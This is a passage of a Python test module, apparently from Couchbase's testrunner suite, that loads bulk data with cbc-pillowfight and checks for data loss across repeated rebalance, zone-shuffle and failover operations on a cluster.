source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
volume.py
|
from threading import Thread
import threading
from lib.testconstants import STANDARD_BUCKET_PORT
from couchbase_helper.document import DesignDocument, View
from basetestcase import BaseTestCase
from rebalance.rebalance_base import RebalanceBaseTest
from membase.api.rest_client import RestConnection, RestHelper
class VolumeTests(BaseTestCase):
def setUp(self):
super(VolumeTests, self).setUp()
self.zone = self.input.param("zone", 1)
self.recoveryType = self.input.param("recoveryType", "full")
self.ddocs = []
self.default_view_name = "upgrade-test-view"
self.ddocs_num = self.input.param("ddocs-num", 0)
self.view_num = self.input.param("view-per-ddoc", 2)
self.is_dev_ddoc = self.input.param("is-dev-ddoc", False)
self.rate_limit = self.input.param("rate_limit", 100000)
self.batch_size = self.input.param("batch_size", 10000)
self.doc_size = self.input.param("doc_size", 100)
self.loader = self.input.param("loader", "pillowfight")
self.instances = self.input.param("instances", 1)
self.node_out = self.input.param("node_out", 0)
self.threads = self.input.param("threads", 5)
self.use_replica_to = self.input.param("use_replica_to", False)
self.reload_size = self.input.param("reload_size", 50000)
self.initial_load= self.input.param("initial_load", 10000)
def tearDown(self):
super(VolumeTests, self).tearDown()
def load(self, server, items, bucket,start_at=0,batch=1000):
import subprocess
from lib.testconstants import COUCHBASE_FROM_SPOCK
rest = RestConnection(server)
num_cycles = int((items // batch )) // 5
cmd = "cbc-pillowfight -U couchbase://{0}/{3} -I {1} -m 10 -M 100 -B {2} --populate-only --start-at {4} --json".format(server.ip, items, batch, bucket, start_at)
if rest.get_nodes_version()[:5] in COUCHBASE_FROM_SPOCK:
cmd += " -u Administrator -P password"
self.log.info("Executing '{0}'...".format(cmd))
rc = subprocess.call(cmd, shell=True)
if rc != 0:
self.fail("Exception running cbc-pillowfight: subprocess module returned non-zero response!")
def check_dataloss(self, server, bucket, num_items):
from couchbase.bucket import Bucket
from couchbase.exceptions import NotFoundError, CouchbaseError
from lib.memcached.helper.data_helper import VBucketAwareMemcached
self.log.info("########## validating data for bucket : {} ###########".format(bucket))
cb_version= cb_version = RestConnection(server).get_nodes_version()[:3]
if cb_version < "5":
bkt = Bucket('couchbase://{0}/{1}'.format(server.ip, bucket.name), timeout=5000)
else:
bkt = Bucket('couchbase://{0}/{1}'.format(server.ip, bucket.name), username=server.rest_username,
password=server.rest_password, timeout=5000)
rest = RestConnection(self.master)
VBucketAware = VBucketAwareMemcached(rest, bucket.name)
_, _, _ = VBucketAware.request_map(rest, bucket.name)
batch_start = 0
batch_end = 0
batch_size = 10000
errors = []
while num_items > batch_end:
batch_end = batch_start + batch_size
keys = []
for i in range(batch_start, batch_end, 1):
keys.append(str(i).rjust(20, '0'))
try:
bkt.get_multi(keys)
self.log.info("Able to fetch keys starting from {0} to {1}".format(keys[0], keys[len(keys) - 1]))
except CouchbaseError as e:
self.log.error(e)
ok, fail = e.split_results()
if fail:
for key in fail:
try:
bkt.get(key)
except NotFoundError:
vBucketId = VBucketAware._get_vBucket_id(key)
errors.append("Missing key: {0}, VBucketId: {1}".
format(key, vBucketId))
batch_start += batch_size
self.log.info("Total missing keys:{}".format(len(errors)))
self.log.info(errors)
return errors
def create_ddocs_and_views(self):
self.default_view = View(self.default_view_name, None, None)
for bucket in self.buckets:
for i in range(int(self.ddocs_num)):
views = self.make_default_views(self.default_view_name, self.view_num,
self.is_dev_ddoc, different_map=True)
ddoc = DesignDocument(self.default_view_name + str(i), views)
self.ddocs.append(ddoc)
for view in views:
self.cluster.create_view(self.master, ddoc.name, view, bucket=bucket)
def test_volume_with_rebalance(self):
self.src_bucket = RestConnection(self.master).get_buckets()
rest = RestConnection(self.master)
bucket = rest.get_buckets()
#load initial documents
self.create_ddocs_and_views()
load_thread=[]
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b)))
for t in load_thread:
t.start()
servers_init = self.servers[:self.nodes_init]
new_server_list=self.servers[0:self.nodes_init]
for t in load_thread:
t.join()
self.sleep(30)
#Reload more data for mutations
load_thread=[]
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items)))
for t in load_thread:
t.start()
# #Rebalance in 1 node
self.log.info("==========rebalance in 1 node=========")
servers_in=self.servers[self.nodes_init:self.nodes_init + 1]
rebalance = self.cluster.async_rebalance(servers_init,
servers_in, [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b, self.num_items*2)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items*2)))
for t in load_thread:
t.start()
#rebalance out 1 node
new_server_list = self.servers[0:self.nodes_init]+ servers_in
self.log.info("==========rebalance out 1 node=========")
servers_out=[self.servers[self.nodes_init]]
rebalance = self.cluster.async_rebalance(servers_init, [],
servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b, self.num_items*3)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items*3)))
for t in load_thread:
t.start()
new_server_list=list(set(new_server_list)- set(servers_out))
#swap rebalance 1 node
self.log.info("==========swap rebalance 1 node=========")
servers_in = self.servers[self.nodes_init : self.nodes_init + 1]
servers_init = self.servers[:self.nodes_init]
servers_out = self.servers[(self.nodes_init - 1) : self.nodes_init]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
rebalance.result()
for t in load_thread:
t.join()
self.sleep(30)
for b in bucket:
self.check_dataloss(self.master, b, self.num_items*4)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items*4)))
for t in load_thread:
t.start()
new_server_list=list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance out of 2 nodes and Rebalance In 1 node=========")
# Rebalance out of 2 nodes and Rebalance In 1 node
servers_in = [list(set(self.servers) - set(new_server_list))[0]]
servers_out = list(set(new_server_list) - {self.master})[-2:]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b, self.num_items*5)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items*5)))
for t in load_thread:
t.start()
new_server_list=list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance out of 1 nodes and Rebalance In 2 nodes=========")
#Rebalance out of 1 nodes and Rebalance In 2 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:2]
servers_out = list(set(new_server_list) - {self.master})[0:1]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b, self.num_items*6)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items*6)))
for t in load_thread:
t.start()
new_server_list=list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance in 4 nodes =========")
#Rebalance in 4 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b, self.num_items*7)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items*7)))
for t in load_thread:
t.start()
new_server_list=list(set(new_server_list + servers_in))
self.log.info("==========Rebalance out 4 nodes =========")
#Rebalance out 4 nodes
servers_out = list(set(new_server_list) - {self.master})[0:4]
rebalance = self.cluster.async_rebalance(servers_init, [], servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b, self.num_items*8)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items*8)))
for t in load_thread:
t.start()
new_server_list = list(set(new_server_list) - set(servers_out))
self.log.info("======Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups=========")
#Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b, self.num_items*9)
self.sleep(30)
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items * 9)))
for t in load_thread:
t.start()
self.shuffle_nodes_between_zones_and_rebalance()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b, self.num_items*10)
self.sleep(30)
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items * 10)))
for t in load_thread:
t.start()
self.log.info("======Graceful failover 1 KV node and add back(Delta and Full)=========")
#Graceful failover 1 KV node and add back(Delta and Full)
kv_server = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
fail_over_task = self.cluster.async_failover([self.master], failover_nodes=[kv_server], graceful=True)
fail_over_task.result()
self.sleep(120)
# do a recovery and rebalance
rest.set_recovery_type('ns_1@' + kv_server.ip, recoveryType=self.recoveryType)
rest.add_back_node('ns_1@' + kv_server.ip)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b, self.num_items*11)
self.sleep(30)
def test_volume_with_high_ops(self):
self.src_bucket = RestConnection(self.master).get_buckets()
rest = RestConnection(self.master)
bucket = rest.get_buckets()
start_at=0
total_doc=self.num_items
#load initial documents
self.create_ddocs_and_views()
load_thread=[]
for bk in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(self.master, bk, self.num_items,
self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, batch=self.batch_size, instances=self.instances)
self.sleep(30)
start_at=total_doc
#Reload more data for mutations
load_thread=[]
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops,
args=(self.master, b, self.num_items,
self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc +=self.num_items
start_at=total_doc
servers_init = self.servers[:self.nodes_init]
# #Rebalance in 1 node
self.log.info("==========rebalance in 1 node=========")
servers_in=self.servers[self.nodes_init:self.nodes_init + 1]
rebalance = self.cluster.async_rebalance(servers_init,
servers_in, [])
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc, start_at=self.load_till_rebalance_progress(rest, bucket, total_doc, start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, batch=self.batch_size, instances=self.instances)
# Reload more data for mutations
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops,
args=(self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc +=self.num_items
start_at=total_doc
# rebalance out 1 node
new_server_list = self.servers[0:self.nodes_init] + servers_in
self.log.info("==========rebalance out 1 node=========")
servers_out = [self.servers[self.nodes_init]]
rebalance = self.cluster.async_rebalance(servers_init, [], servers_out)
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc, start_at=self.load_till_rebalance_progress(rest, bucket, total_doc, start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, batch=self.batch_size, instances=self.instances)
self.sleep(30)
# Reload more data for mutations
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc +=self.num_items
start_at=total_doc
new_server_list = list(set(new_server_list) - set(servers_out))
# swap rebalance 1 node
self.log.info("==========swap rebalance 1 node=========")
servers_in = self.servers[self.nodes_init: self.nodes_init + 1]
servers_init = self.servers[:self.nodes_init]
servers_out = self.servers[(self.nodes_init - 1): self.nodes_init]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc, start_at=self.load_till_rebalance_progress(rest, bucket, total_doc, start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, batch=self.batch_size, instances=self.instances)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc +=self.num_items
start_at=total_doc
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance out of 2 nodes and Rebalance In 1 node=========")
# Rebalance out of 2 nodes and Rebalance In 1 node
servers_in = [list(set(self.servers) - set(new_server_list))[0]]
servers_out = list(set(new_server_list) - {self.master})[-2:]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc, start_at=self.load_till_rebalance_progress(rest, bucket, total_doc, start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, batch=self.batch_size, instances=self.instances)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc += self.num_items
start_at = total_doc
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance out of 1 nodes and Rebalance In 2 nodes=========")
# Rebalance out of 1 nodes and Rebalance In 2 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:2]
servers_out = list(set(new_server_list) - {self.master})[0:1]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc, start_at=self.load_till_rebalance_progress(rest, bucket, total_doc, start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, batch=self.batch_size, instances=self.instances)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc += self.num_items
start_at = total_doc
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance in 4 nodes =========")
# Rebalance in 4 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc, start_at=self.load_till_rebalance_progress(rest, bucket, total_doc, start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, batch=self.batch_size, instances=self.instances)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc += self.num_items
start_at = total_doc
new_server_list = list(set(new_server_list + servers_in))
self.log.info("==========Rebalance out 4 nodes =========")
# Rebalance out 4 nodes
servers_out = list(set(new_server_list) - {self.master})[0:4]
rebalance = self.cluster.async_rebalance(servers_init, [], servers_out)
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc, start_at=self.load_till_rebalance_progress(rest, bucket, total_doc, start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, batch=self.batch_size, instances=self.instances)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc += self.num_items
start_at = total_doc
new_server_list = list(set(new_server_list) - set(servers_out))
self.log.info(
"======Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups=========")
# Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc, start_at=self.load_till_rebalance_progress(rest, bucket, total_doc, start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, batch=self.batch_size, instances=self.instances)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc += self.num_items
start_at = total_doc
self.log.info("####### Shuffling zones and rebalance #######")
self.shuffle_nodes_between_zones_and_rebalance()
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc, start_at = self.load_till_rebalance_progress(rest, bucket, total_doc, start_at)
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, batch=self.batch_size, instances=self.instances)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc += self.num_items
start_at = total_doc
self.log.info("======Graceful failover 1 KV node and add back(Delta and Full)=========")
# Graceful failover 1 KV node and add back(Delta and Full)
kv_server = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
fail_over_task = self.cluster.async_failover([self.master], failover_nodes=[kv_server], graceful=True)
fail_over_task.result()
self.sleep(120)
# do a recovery and rebalance
rest.set_recovery_type('ns_1@' + kv_server.ip, recoveryType=self.recoveryType)
rest.add_back_node('ns_1@' + kv_server.ip)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [])
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc, start_at = self.load_till_rebalance_progress(rest, bucket, total_doc, start_at)
rebalance.result()
for b in bucket:
errors=self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, batch=self.batch_size, instances=self.instances)
if len(errors) > 0:
self.fail("data is missing");
self.sleep(30)
def test_volume_with_high_ops_update(self):
self.src_bucket = RestConnection(self.master).get_buckets()
rest = RestConnection(self.master)
bucket = rest.get_buckets()
start_at = 0
total_doc = self.num_items
updated=1
# load initial documents
self.create_ddocs_and_views()
load_thread = []
for bk in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, bk, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, batch=self.batch_size, instances=self.instances)
self.sleep(30)
#Update all data
load_thread=[]
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops,
args=(self.master, b, total_doc, total_doc,
self.batch_size, self.threads, start_at, self.instances, updated)))
for t in load_thread:
t.start()
servers_init = self.servers[:self.nodes_init]
#Rebalance in 1 node
self.log.info("==========rebalance in 1 node=========")
servers_in=self.servers[self.nodes_init:self.nodes_init + 1]
rebalance = self.cluster.async_rebalance(servers_init,
servers_in, [])
for t in load_thread:
t.join()
#total_doc,start_at=self.load_till_rebalance_progress(rest,bucket,total_doc,start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True, ops=total_doc,
batch=self.batch_size, instances=self.instances)
updated +=1
#Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances, updated)))
for t in load_thread:
t.start()
# rebalance out 1 node
new_server_list = self.servers[0:self.nodes_init] + servers_in
self.log.info("==========rebalance out 1 node=========")
servers_out = [self.servers[self.nodes_init]]
rebalance = self.cluster.async_rebalance(servers_init, [], servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc*updated, batch=self.batch_size, instances=self.instances)
updated +=1
#Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances, updated)))
for t in load_thread:
t.start()
new_server_list = list(set(new_server_list) - set(servers_out))
# swap rebalance 1 node
self.log.info("==========swap rebalance 1 node=========")
servers_in = self.servers[self.nodes_init: self.nodes_init + 1]
servers_init = self.servers[:self.nodes_init]
servers_out = self.servers[(self.nodes_init - 1): self.nodes_init]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc*updated, batch=self.batch_size, instances=self.instances)
updated += 1
# Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,
updated)))
for t in load_thread:
t.start()
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance out of 2 nodes and Rebalance In 1 node=========")
# Rebalance out of 2 nodes and Rebalance In 1 node
servers_in = [list(set(self.servers) - set(new_server_list))[0]]
servers_out = list(set(new_server_list) - {self.master})[-2:]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc * updated, batch=self.batch_size, instances=self.instances)
updated += 1
# Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,
updated)))
for t in load_thread:
t.start()
self.log.info("==========Rebalance out of 1 nodes and Rebalance In 2 nodes=========")
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
# Rebalance out of 1 nodes and Rebalance In 2 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:2]
servers_out = list(set(new_server_list) - {self.master})[0:1]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc * updated, batch=self.batch_size, instances=self.instances)
updated += 1
# Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,
updated)))
for t in load_thread:
t.start()
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance in 4 nodes =========")
# Rebalance in 4 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc * updated, batch=self.batch_size, instances=self.instances)
updated += 1
# Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,
updated)))
for t in load_thread:
t.start()
new_server_list = list(set(new_server_list + servers_in))
self.log.info("==========Rebalance out 4 nodes =========")
# Rebalance out 4 nodes
servers_out = list(set(new_server_list) - {self.master})[0:4]
rebalance = self.cluster.async_rebalance(servers_init, [], servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc * updated, batch=self.batch_size,
instances=self.instances)
updated += 1
# Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,
updated)))
for t in load_thread:
t.start()
new_server_list = list(set(new_server_list) - set(servers_out))
self.log.info(
"======Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups=========")
# Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc * updated, batch=self.batch_size,
instances=self.instances)
updated += 1
# Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,
updated)))
for t in load_thread:
t.start()
self.log.info("####### Shuffling zones and rebalance #######")
self.shuffle_nodes_between_zones_and_rebalance()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc * updated, batch=self.batch_size,
instances=self.instances)
updated += 1
# Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,
updated)))
for t in load_thread:
t.start()
self.log.info("======Graceful failover 1 KV node and add back(Delta and Full)=========")
# Graceful failover 1 KV node and add back(Delta and Full)
kv_server = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
fail_over_task = self.cluster.async_failover([self.master], failover_nodes=[kv_server], graceful=True)
fail_over_task.result()
self.sleep(120)
# do a recovery and rebalance
rest.set_recovery_type('ns_1@' + kv_server.ip, recoveryType=self.recoveryType)
rest.add_back_node('ns_1@' + kv_server.ip)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
errors=self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc * updated, batch=self.batch_size,
instances=self.instances)
if len(errors) > 0:
self.fail("data is missing");
def test_volume_with_high_ops_create_update(self):
self.src_bucket = RestConnection(self.master).get_buckets()
rest = RestConnection(self.master)
bucket = rest.get_buckets()
start_at = 0
# load initial documents
self.create_ddocs_and_views()
load_thread = []
for bk in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, bk, self.initial_load, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, batch=self.batch_size, instances=self.instances)
self.sleep(30)
total_doc = self.initial_load
start_at=total_doc
#Update initial doc and create more doc
load_thread=[]
create_thread=[]
updated=1
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops,
args=(self.master, b, self.initial_load, self.initial_load,
self.batch_size, self.threads, 0, self.instances, updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc +=self.num_items
start_at=total_doc
updated +=1
servers_init = self.servers[:self.nodes_init]
#Rebalance in 1 node
self.log.info("==========rebalance in 1 node=========")
servers_in=self.servers[self.nodes_init:self.nodes_init + 1]
rebalance = self.cluster.async_rebalance(servers_init,
servers_in, [])
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated=self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at, updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
ops=self.initial_load*(updated-1), batch=self.batch_size, instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc-self.initial_load,
start_document=self.initial_load, batch=self.batch_size, instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0, self.instances, updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated +=1
# rebalance out 1 node
new_server_list = self.servers[0:self.nodes_init] + servers_in
self.log.info("==========rebalance out 1 node=========")
servers_out = [self.servers[self.nodes_init]]
rebalance = self.cluster.async_rebalance(servers_init, [], servers_out)
rebalance.result()
self.sleep(5)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
